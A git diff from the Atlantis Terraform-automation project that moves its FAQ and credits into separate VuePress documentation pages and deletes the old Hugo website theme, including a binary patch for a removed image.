website/src/themes/kube/layouts/404.html | 12 - .../themes/kube/layouts/_default/baseof.html | 68 - .../themes/kube/layouts/_default/list.html | 18 - .../themes/kube/layouts/_default/single.html | 18 - .../src/themes/kube/layouts/blog/single.html | 58 - .../src/themes/kube/layouts/docs/single.html | 23 - website/src/themes/kube/layouts/index.html | 46 - .../themes/kube/layouts/partials/favicon.html | 1 - .../themes/kube/layouts/partials/footer.html | 26 - .../themes/kube/layouts/partials/header.html | 27 - .../layouts/partials/meta/name-author.html | 6 - .../kube/layouts/partials/meta/ogimage.html | 8 - .../kube/layouts/partials/page-summary.html | 9 - .../kube/layouts/partials/pagination.html | 15 - .../kube/layouts/partials/post/byauthor.html | 20 - .../layouts/partials/post/category-link.html | 1 - .../kube/layouts/partials/post/meta.html | 14 - .../partials/post/related-content.html | 16 - .../kube/layouts/partials/post/tag-link.html | 1 - .../layouts/partials/scripts/animation.html | 127 - .../layouts/partials/site-verification.html | 12 - .../src/themes/kube/layouts/partials/toc.html | 21 - .../src/themes/kube/layouts/section/docs.html | 22 - .../src/themes/kube/layouts/section/faq.html | 16 - website/src/themes/kube/static/css/custom.css | 6 - website/src/themes/kube/static/css/font.css | 68 - .../src/themes/kube/static/css/highlight.css | 1 - website/src/themes/kube/static/css/kube.css | 2156 ---------------- .../src/themes/kube/static/css/kube.demo.css | 404 --- .../themes/kube/static/css/kube.legenda.css | 406 --- .../src/themes/kube/static/css/kube.min.css | 1 - website/src/themes/kube/static/css/master.css | 1132 --------- .../themes/kube/static/font/Lato-Black.woff | Bin 297272 -> 0 bytes .../themes/kube/static/font/Lato-Bold.woff | Bin 328952 -> 0 bytes .../kube/static/font/Lato-BoldItalic.woff | Bin 347092 -> 0 bytes .../themes/kube/static/font/Lato-Italic.woff | Bin 343528 -> 0 bytes .../themes/kube/static/font/Lato-Regular.woff | Bin 323172 -> 0 
bytes .../kube/static/font/Lato-Semibold.woff | Bin 326132 -> 0 bytes .../kube/static/img/common/icon-twitter.png | Bin 8496 -> 0 bytes .../themes/kube/static/img/common/logo.png | Bin 1462 -> 0 bytes .../themes/kube/static/img/common/logx2.png | Bin 2384 -> 0 bytes .../kube/static/img/icon-minimalism.png | Bin 1753 -> 0 bytes .../src/themes/kube/static/img/icon-typo.png | Bin 1133 -> 0 bytes .../src/themes/kube/static/img/kube/brand.png | Bin 1848 -> 0 bytes .../kube/static/img/kube/icon-baseline.png | Bin 1024 -> 0 bytes .../kube/static/img/kube/icon-minimalism.png | Bin 1753 -> 0 bytes .../themes/kube/static/img/kube/icon-typo.png | Bin 1133 -> 0 bytes .../kube/static/img/kube/typography/01.png | Bin 44318 -> 0 bytes .../kube/static/img/kube/typography/02.png | Bin 6913 -> 0 bytes .../themes/kube/static/js/jquery-2.1.4.min.js | 5 - website/src/themes/kube/static/js/kube.js | 2201 ----------------- .../src/themes/kube/static/js/kube.legenda.js | 0 website/src/themes/kube/static/js/kube.min.js | 1 - website/src/themes/kube/static/js/master.js | 0 .../src/themes/kube/static/js/tocbot.min.js | 18 - website/src/themes/kube/theme.toml | 31 - 78 files changed, 51 insertions(+), 7317 deletions(-) create mode 100644 runatlantis.io/docs/contributing.md create mode 100644 runatlantis.io/docs/faq.md delete mode 100644 website/src/archetypes/default.md delete mode 100644 website/src/archetypes/docs.md delete mode 100644 website/src/config.toml delete mode 100644 website/src/content/_index.md delete mode 100644 website/src/static/.gitkeep delete mode 100644 website/src/static/img/atlantis-highquality.png delete mode 100644 website/src/static/img/atlantis-logo.png delete mode 100644 website/src/static/img/collaborate.png delete mode 100644 website/src/static/img/demo-large.gif delete mode 100644 website/src/static/img/demo.gif delete mode 100644 website/src/static/img/locking.png delete mode 100644 website/src/static/img/logo-384x384.png delete mode 100644 
website/src/static/img/no-need-to-distribute-keys.png delete mode 100644 website/src/themes/kube/.gitignore delete mode 100644 website/src/themes/kube/LICENSE.md delete mode 100644 website/src/themes/kube/README.md delete mode 100644 website/src/themes/kube/archetypes/blog.md delete mode 100644 website/src/themes/kube/archetypes/docs.md delete mode 100644 website/src/themes/kube/layouts/404.html delete mode 100644 website/src/themes/kube/layouts/_default/baseof.html delete mode 100644 website/src/themes/kube/layouts/_default/list.html delete mode 100644 website/src/themes/kube/layouts/_default/single.html delete mode 100644 website/src/themes/kube/layouts/blog/single.html delete mode 100644 website/src/themes/kube/layouts/docs/single.html delete mode 100644 website/src/themes/kube/layouts/index.html delete mode 100644 website/src/themes/kube/layouts/partials/favicon.html delete mode 100644 website/src/themes/kube/layouts/partials/footer.html delete mode 100644 website/src/themes/kube/layouts/partials/header.html delete mode 100644 website/src/themes/kube/layouts/partials/meta/name-author.html delete mode 100644 website/src/themes/kube/layouts/partials/meta/ogimage.html delete mode 100644 website/src/themes/kube/layouts/partials/page-summary.html delete mode 100644 website/src/themes/kube/layouts/partials/pagination.html delete mode 100644 website/src/themes/kube/layouts/partials/post/byauthor.html delete mode 100644 website/src/themes/kube/layouts/partials/post/category-link.html delete mode 100644 website/src/themes/kube/layouts/partials/post/meta.html delete mode 100644 website/src/themes/kube/layouts/partials/post/related-content.html delete mode 100644 website/src/themes/kube/layouts/partials/post/tag-link.html delete mode 100644 website/src/themes/kube/layouts/partials/scripts/animation.html delete mode 100644 website/src/themes/kube/layouts/partials/site-verification.html delete mode 100644 website/src/themes/kube/layouts/partials/toc.html delete mode 100644 
website/src/themes/kube/layouts/section/docs.html delete mode 100644 website/src/themes/kube/layouts/section/faq.html delete mode 100644 website/src/themes/kube/static/css/custom.css delete mode 100644 website/src/themes/kube/static/css/font.css delete mode 100644 website/src/themes/kube/static/css/highlight.css delete mode 100644 website/src/themes/kube/static/css/kube.css delete mode 100644 website/src/themes/kube/static/css/kube.demo.css delete mode 100644 website/src/themes/kube/static/css/kube.legenda.css delete mode 100644 website/src/themes/kube/static/css/kube.min.css delete mode 100644 website/src/themes/kube/static/css/master.css delete mode 100644 website/src/themes/kube/static/font/Lato-Black.woff delete mode 100644 website/src/themes/kube/static/font/Lato-Bold.woff delete mode 100644 website/src/themes/kube/static/font/Lato-BoldItalic.woff delete mode 100644 website/src/themes/kube/static/font/Lato-Italic.woff delete mode 100644 website/src/themes/kube/static/font/Lato-Regular.woff delete mode 100644 website/src/themes/kube/static/font/Lato-Semibold.woff delete mode 100644 website/src/themes/kube/static/img/common/icon-twitter.png delete mode 100644 website/src/themes/kube/static/img/common/logo.png delete mode 100644 website/src/themes/kube/static/img/common/logx2.png delete mode 100644 website/src/themes/kube/static/img/icon-minimalism.png delete mode 100644 website/src/themes/kube/static/img/icon-typo.png delete mode 100644 website/src/themes/kube/static/img/kube/brand.png delete mode 100644 website/src/themes/kube/static/img/kube/icon-baseline.png delete mode 100644 website/src/themes/kube/static/img/kube/icon-minimalism.png delete mode 100644 website/src/themes/kube/static/img/kube/icon-typo.png delete mode 100644 website/src/themes/kube/static/img/kube/typography/01.png delete mode 100644 website/src/themes/kube/static/img/kube/typography/02.png delete mode 100644 website/src/themes/kube/static/js/jquery-2.1.4.min.js delete mode 100644 
website/src/themes/kube/static/js/kube.js delete mode 100644 website/src/themes/kube/static/js/kube.legenda.js delete mode 100644 website/src/themes/kube/static/js/kube.min.js delete mode 100644 website/src/themes/kube/static/js/master.js delete mode 100644 website/src/themes/kube/static/js/tocbot.min.js delete mode 100644 website/src/themes/kube/theme.toml diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js index 9e2f6a54ed..1b6bd0f4ae 100644 --- a/runatlantis.io/.vuepress/config.js +++ b/runatlantis.io/.vuepress/config.js @@ -33,6 +33,8 @@ module.exports = { '/docs/', '/docs/pull-request-commands', '/docs/deployment', + '/docs/faq', + '/docs/contributing', ], repo: 'runatlantis/atlantis', docsDir: 'runatlantis.io', diff --git a/runatlantis.io/docs/README.md b/runatlantis.io/docs/README.md index ad31df63e6..0762964107 100644 --- a/runatlantis.io/docs/README.md +++ b/runatlantis.io/docs/README.md @@ -352,54 +352,6 @@ We identify a project by its repo **and** the path to the root of the project wi #### Workspace/Environment A Terraform workspace. See [terraform docs](https://www.terraform.io/docs/state/workspaces.html) for more information. -## FAQ -**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?** -A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`. -**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?** - -A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening. - -Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands. - -**Q: How to run Atlantis in high availability mode? 
Does it need to be?** - -A: Atlantis server can easily be run under the supervision of a init system like `upstart` or `systemd` to make sure `atlantis server` is always running. - -Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently. - -However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway. - -**Q: How to add SSL to Atlantis server?** - -A: First, you'll need to get a public/private key pair to serve over SSL. -These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags. -See `atlantis server --help` for more information. - -**Q: How can I get Atlantis up and running on AWS?** - -A: There is [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project where complete Terraform configurations for running Atlantis on AWS Fargate are hosted. Tested and maintained. - -## Contributing -Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md). - -## Credits -Atlantis was originally developed at [Hootsuite](https://hootsuite.com) under [hootsuite/atlantis](https://github.com/hootsuite/atlantis). The maintainers are indebted to Hootsuite for supporting the creation and continued development of this project over the last 2 years. The Hootsuite values of building a better way and teamwork made this project possible, alongside constant encouragement and assistance from our colleagues. - -NOTE: We had to remove the "fork" label because otherwise code searches don't work. - -Thank you to these awesome contributors! 
-- [@nicholas-wu-hs](https://github.com/nicholas-wu-hs) -- [@nadavshatz](https://github.com/nadavshatz) -- [@jwieringa](https://github.com/jwieringa) -- [@suhussai](https://github.com/suhussai) -- [@mootpt](https://github.com/mootpt) -- [@codec](https://github.com/codec) -- [@nick-hollingsworth-hs](https://github.com/nick-hollingsworth-hs) -- [@mpmsimo](https://github.com/mpmsimo) -- [@hussfelt](https://github.com/hussfelt) -- [@psalaberria002](https://github.com/psalaberria002) - -* Atlantis Logo: Icon made by [freepik](https://www.flaticon.com/authors/freepik) from www.flaticon.com diff --git a/runatlantis.io/docs/contributing.md b/runatlantis.io/docs/contributing.md new file mode 100644 index 0000000000..072886000c --- /dev/null +++ b/runatlantis.io/docs/contributing.md @@ -0,0 +1,21 @@ +# Contributing +Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md). + +## Credits +Atlantis was originally developed at [Hootsuite](https://hootsuite.com) under [hootsuite/atlantis](https://github.com/hootsuite/atlantis). The maintainers are indebted to Hootsuite for supporting the creation and continued development of this project over the last 2 years. The Hootsuite values of building a better way and teamwork made this project possible, alongside constant encouragement and assistance from our colleagues. + +NOTE: We had to remove the "fork" label because otherwise code searches don't work. + +Thank you to these awesome contributors! 
+- [@nicholas-wu-hs](https://github.com/nicholas-wu-hs) +- [@nadavshatz](https://github.com/nadavshatz) +- [@jwieringa](https://github.com/jwieringa) +- [@suhussai](https://github.com/suhussai) +- [@mootpt](https://github.com/mootpt) +- [@codec](https://github.com/codec) +- [@nick-hollingsworth-hs](https://github.com/nick-hollingsworth-hs) +- [@mpmsimo](https://github.com/mpmsimo) +- [@hussfelt](https://github.com/hussfelt) +- [@psalaberria002](https://github.com/psalaberria002) + +* Atlantis Logo: Icon made by [freepik](https://www.flaticon.com/authors/freepik) from www.flaticon.com diff --git a/runatlantis.io/docs/faq.md b/runatlantis.io/docs/faq.md new file mode 100644 index 0000000000..379bd74e99 --- /dev/null +++ b/runatlantis.io/docs/faq.md @@ -0,0 +1,28 @@ +# FAQ +**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?** + +A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`. + +**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?** + +A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening. + +Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands. + +**Q: How to run Atlantis in high availability mode? Does it need to be?** + +A: Atlantis server can easily be run under the supervision of a init system like `upstart` or `systemd` to make sure `atlantis server` is always running. + +Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently. 
+ +However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway. + +**Q: How to add SSL to Atlantis server?** + +A: First, you'll need to get a public/private key pair to serve over SSL. +These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags. +See `atlantis server --help` for more information. + +**Q: How can I get Atlantis up and running on AWS?** + +A: There is [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project where complete Terraform configurations for running Atlantis on AWS Fargate are hosted. Tested and maintained. \ No newline at end of file diff --git a/website/src/archetypes/default.md b/website/src/archetypes/default.md deleted file mode 100644 index f5a9e450ff..0000000000 --- a/website/src/archetypes/default.md +++ /dev/null @@ -1,6 +0,0 @@ ---- -title: "{{ replace .TranslationBaseName "-" " " | title }}" -date: {{ .Date }} -draft: true ---- - diff --git a/website/src/archetypes/docs.md b/website/src/archetypes/docs.md deleted file mode 100644 index fa23e66f29..0000000000 --- a/website/src/archetypes/docs.md +++ /dev/null @@ -1,8 +0,0 @@ -+++ -title = "" -description = "" -weight = 20 -draft = false -bref = "" -toc = true -+++ diff --git a/website/src/config.toml b/website/src/config.toml deleted file mode 100644 index 7a7e264100..0000000000 --- a/website/src/config.toml +++ /dev/null @@ -1,22 +0,0 @@ -baseURL = "https://www.runatlantis.io" -languageCode = "en-us" -title = "Atlantis - A unified workflow for collaborating on Terraform through GitHub and GitLab" -theme = "kube" -description = "A unified workflow for collaborating on Terraform through GitHub and GitLab" -Paginate = 4 -[[menu.main]] - name = "Docs" - weight 
= -100 - url = "https://github.com/runatlantis/atlantis#getting-started" -[[menu.main]] - name = "Blog" - weight = -100 - url = "https://medium.com/runatlantis" -[[menu.main]] - name = "FAQ" - weight = -100 - url = "https://github.com/runatlantis/atlantis#faq" -[[menu.main]] - name = "Demo" - weight = 100 - url = "https://www.youtube.com/watch?v=TmIPWda0IKg" diff --git a/website/src/content/_index.md b/website/src/content/_index.md deleted file mode 100644 index 796172245b..0000000000 --- a/website/src/content/_index.md +++ /dev/null @@ -1,6 +0,0 @@ -+++ -description = "A unified workflow for collaborating on Terraform through GitHub and GitLab" -title = "Atlantis" -draft = false - -+++ diff --git a/website/src/static/.gitkeep b/website/src/static/.gitkeep deleted file mode 100644 index e69de29bb2..0000000000 diff --git a/website/src/static/img/atlantis-highquality.png b/website/src/static/img/atlantis-highquality.png deleted file mode 100644 index 4fab9dd9627234e028fc354369562e2081f28960..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 21445 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 
